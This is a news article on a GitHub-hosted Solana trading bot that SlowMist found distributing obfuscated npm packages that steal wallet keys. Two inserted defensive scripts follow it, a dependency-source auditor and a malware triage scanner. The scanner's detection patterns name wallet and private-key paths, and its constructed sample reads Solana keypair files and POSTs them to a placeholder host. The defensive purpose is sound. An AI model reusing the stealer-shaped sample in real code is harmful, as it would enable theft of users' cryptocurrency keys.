A Solana trading bot hosted on GitHub has been exposed as malware that steals users' cryptocurrency.

9 hours ago

A GitHub repository disguised as a legitimate Solana trading bot has been exposed, reportedly hiding malware that steals cryptocurrency.

According to a report released by blockchain security company SlowMist on Friday, the now-deleted solana-pumpfun-bot repository, hosted by the account "zldp2002," mimicked a real open-source tool to collect user credentials. The investigation was initiated by SlowMist after a user discovered their funds had been stolen on Thursday.

SlowMist stated that the malicious repository "had a relatively high number of stars and forks." Yet the commits across all of its directories dated from about three weeks earlier and showed obvious irregularities with no consistent pattern, which, according to SlowMist, is not what a legitimately maintained project looks like.

The project is a Node.js application that declares the third-party package crypto-layout-utils as a dependency. SlowMist noted, "Upon further inspection, we found that this package has been removed from the official NPM registry."

Because the package can no longer be downloaded from the official Node Package Manager (NPM) registry, the investigators asked how the victims had obtained it at all. Further investigation showed that the project did not fetch the library from the registry: the attackers had it pulled from a separate GitHub repository instead, so the registry takedown had no effect on anyone installing the bot.
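The dependency trick described above is easy to check for. The following script is an added example, not code from the article or from SlowMist's report: it audits a Node.js project's package.json for version specifiers that bypass the npm registry (tarball URLs, git and GitHub references, local paths) and its package-lock.json for "resolved" URLs that do not point at a registry host. The manifest and lockfile it runs on are constructed for illustration; the example-org URLs are placeholders, not the attackers' real hosting.

```javascript
// Added example, not code from the article or from SlowMist's report:
// audit where a Node.js project's dependencies are actually fetched from.
// The manifest and lockfile below are constructed for illustration; the
// "example-org" URLs are placeholders, not the attackers' real hosting.

const REGISTRY_HOSTS = new Set(["registry.npmjs.org", "registry.yarnpkg.com"]);

// Classify a package.json version specifier. Only semver ranges, dist-tags
// and npm: aliases are served by the registry; everything else is fetched
// from a URL, a git host or the local disk, outside the registry's control.
function classifySpecifier(spec) {
  const s = String(spec).trim();
  if (s === "" || s === "*" || s === "latest" || s.startsWith("npm:")) return "registry";
  if (/^(git\+|git:|ssh:)/.test(s) || /\.git(#[^#]*)?$/.test(s)) return "git";
  if (/^(github|gist|gitlab|bitbucket):/.test(s)) return "git-host";
  if (/^https?:\/\//.test(s)) return "url";
  if (/^(file:|\.{0,2}\/|~\/)/.test(s)) return "file";
  if (/^[^@\s/:]+\/[^\s/]+$/.test(s)) return "git-host";   // owner/repo[#ref] shorthand
  if (/^[\w.+*^~<>=|\s-]+$/.test(s)) return "registry";   // semver range or dist-tag
  return "unknown";
}

// Walk every dependency section and report specifiers that leave the registry.
function auditManifest(manifestJson) {
  const manifest = JSON.parse(manifestJson);
  const findings = [];
  for (const field of ["dependencies", "devDependencies", "optionalDependencies"]) {
    for (const [name, spec] of Object.entries(manifest[field] || {})) {
      const kind = classifySpecifier(spec);
      if (kind !== "registry") findings.push({ field, name, spec, kind });
    }
  }
  return findings;
}

// The lockfile (v2/v3 "packages" map) records the URL npm actually downloaded.
// Every "resolved" value should point at a registry host, and a missing
// "integrity" field means nothing pins the tarball's contents.
function auditLockfile(lockJson) {
  const lock = JSON.parse(lockJson);
  const findings = [];
  for (const [path, entry] of Object.entries(lock.packages || {})) {
    if (path === "" || entry.link) continue;   // root entry or workspace symlink
    let host = null;
    try { host = new URL(entry.resolved || "").hostname; } catch (_) { /* not a URL */ }
    if (!host || !REGISTRY_HOSTS.has(host) || !entry.integrity) {
      findings.push({ path, resolved: entry.resolved || null, integrity: entry.integrity || null });
    }
  }
  return findings;
}

// Constructed sample manifest: one dependency pulled from a GitHub release
// tarball, one from a GitHub shorthand, one from disk, one from a git URL.
const SAMPLE_PACKAGE_JSON = JSON.stringify({
  name: "trading-bot-sample",
  dependencies: {
    "@solana/web3.js": "^1.95.0",
    "crypto-layout-utils": "https://github.com/example-org/crypto-layout-utils/releases/download/v1.3.1/crypto-layout-utils-1.3.1.tgz",
    "bs58-encrypt-utils": "github:example-org/bs58-encrypt-utils#main",
    "local-helper": "file:../helper",
    "other-lib": "git+ssh://git@github.com/example-org/other-lib.git"
  },
  devDependencies: { typescript: "~5.4.0" }
});

// Constructed sample lockfile: the registry entry carries an integrity hash,
// the GitHub tarball entry carries none.
const SAMPLE_LOCKFILE = JSON.stringify({
  name: "trading-bot-sample",
  lockfileVersion: 3,
  packages: {
    "": { name: "trading-bot-sample" },
    "node_modules/@solana/web3.js": {
      version: "1.95.3",
      resolved: "https://registry.npmjs.org/@solana/web3.js/-/web3.js-1.95.3.tgz",
      integrity: "sha512-PLACEHOLDER"
    },
    "node_modules/crypto-layout-utils": {
      version: "1.3.1",
      resolved: "https://github.com/example-org/crypto-layout-utils/releases/download/v1.3.1/crypto-layout-utils-1.3.1.tgz"
    }
  }
});

console.log("manifest findings:", auditManifest(SAMPLE_PACKAGE_JSON));
console.log("lockfile findings:", auditLockfile(SAMPLE_LOCKFILE));
```

Run it against a cloned repository by replacing the constructed strings with the contents of its package.json and package-lock.json. Anything reported deserves a look before `npm install`, since a dependency fetched from a URL or git host is whatever that host serves today, not the audited artifact the registry would have delivered, and a registry takedown of the same name (as happened with crypto-layout-utils) does nothing to stop it.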

After analyzing the package, SlowMist researchers found that it had been heavily obfuscated with jsjiami.com.v7, which makes analysis more difficult. Once deobfuscated, the package was confirmed to be malicious: it scans local files and uploads any wallet-related content or private keys it finds to a remote server.
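A package with those traits leaves static fingerprints even before deobfuscation: the obfuscator's own marker, hex-named identifiers, and a source that combines filesystem enumeration, wallet-related paths and an outbound network channel. The following triage script is an added example, not code from the article or from SlowMist's report; it scores a package's JavaScript on those indicators. The two sample sources it runs on are constructed for illustration (the "obfuscated" one imitates the shape of such code, it is not the real payload), and the indicator list and score threshold are assumptions of this example.

```javascript
// Added example, not code from the article or from SlowMist's report:
// static triage of an installed package's JavaScript for the combination
// described above: obfuscation, local file enumeration, wallet-related
// paths and an outbound network channel. Both sample sources are constructed;
// the indicator list and the score threshold are this example's assumptions.

const INDICATORS = [
  // jsjiami leaves a version banner at the top of its output
  { id: "obfuscator-marker", weight: 3, re: /jsjiami\.com\.v\d+/i },
  // obfuscators rename everything to _0x.... identifiers; require several
  { id: "hex-identifiers",   weight: 2, re: /_0x[0-9a-f]{3,6}\b/g, min: 5 },
  { id: "fs-module",         weight: 1, re: /require\(\s*['"]fs['"]\s*\)|from\s+['"]fs['"]/ },
  // string literals are matched on purpose: obfuscated code calls fs via a string table
  { id: "file-enumeration",  weight: 1, re: /readdirSync|readdir\b|readFileSync|readFile\b/ },
  { id: "wallet-paths",      weight: 2, re: /homedir|\.config\/solana|id\.json|keypair|wallet|mnemonic|private[_-]?key/i },
  { id: "network",           weight: 1, re: /require\(\s*['"](https?|net|dgram)['"]\s*\)|\bfetch\(|\baxios\b/ },
];
const SUSPICIOUS_SCORE = 6;   // assumed threshold: obfuscation plus file and network access

// Score one source file; returns the hits so an analyst sees why it fired.
function triageSource(source) {
  const hits = [];
  let score = 0;
  for (const ind of INDICATORS) {
    const count = ind.re.global
      ? (source.match(ind.re) || []).length
      : (ind.re.test(source) ? 1 : 0);
    if (count >= (ind.min || 1)) {
      hits.push({ id: ind.id, count });
      score += ind.weight;
    }
  }
  return { score, suspicious: score >= SUSPICIOUS_SCORE, hits };
}

// Constructed sample imitating the shape of obfuscated stealer code:
// walks the Solana CLI config directory and POSTs each file out.
const MALICIOUS_SAMPLE = `
// jsjiami.com.v7
var _0x3f2a=['homedir','readdirSync','readFileSync','request','/.config/solana/'];
const _0x1b9c=require('os'),_0x4d2e=require('fs'),_0x5e7f=require('https');
const _0x2c81=_0x1b9c[_0x3f2a[0]]()+_0x3f2a[4];
for(const _0x6a10 of _0x4d2e[_0x3f2a[1]](_0x2c81)){
  _0x5e7f[_0x3f2a[3]]({hostname:'collector.invalid',method:'POST'}).end(_0x4d2e[_0x3f2a[2]](_0x2c81+_0x6a10));
}`;

// Constructed benign sample: reads its own config and calls a price API.
const BENIGN_SAMPLE = `
// Reads the bot configuration and submits a price quote.
const fs = require('fs');
const https = require('https');
const cfg = JSON.parse(fs.readFileSync('./config.json', 'utf8'));
https.get('https://api.invalid/quote?pair=' + cfg.pair, res => res.pipe(process.stdout));
`;

console.log("obfuscated sample:", JSON.stringify(triageSource(MALICIOUS_SAMPLE)));
console.log("benign sample:", JSON.stringify(triageSource(BENIGN_SAMPLE)));
```

This is a triage heuristic, not a verdict: it produces candidates for manual review. A legitimate Solana bot that reads ~/.config/solana/id.json and talks to an RPC endpoint scores below the threshold here (no obfuscation indicators), while the obfuscated sample scores well above it; a determined attacker can of course avoid the jsjiami banner and hex identifiers, so the score should be read together with the dependency-source audit and with where the package actually came from.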

Further investigation by SlowMist indicated that the attackers might control a batch of GitHub accounts. These accounts were used to fork the project into malicious variants while artificially inflating the number of forks and stars to distribute the malware.

Multiple forked repositories exhibited similar characteristics, with some versions also containing another malicious package, bs58-encrypt-utils-1.0.3. This package was created on June 12, and SlowMist researchers believe the attackers have been distributing malicious NPM modules and Node.js projects since then.

This incident is the latest in a series of software supply chain attacks targeting cryptocurrency users. In recent weeks, similar schemes have attacked Firefox users through fake wallet extensions and used GitHub repositories to host code that steals credentials.


Original article: “Solana Bot on GitHub Exposed for Stealing Users' Cryptocurrency”

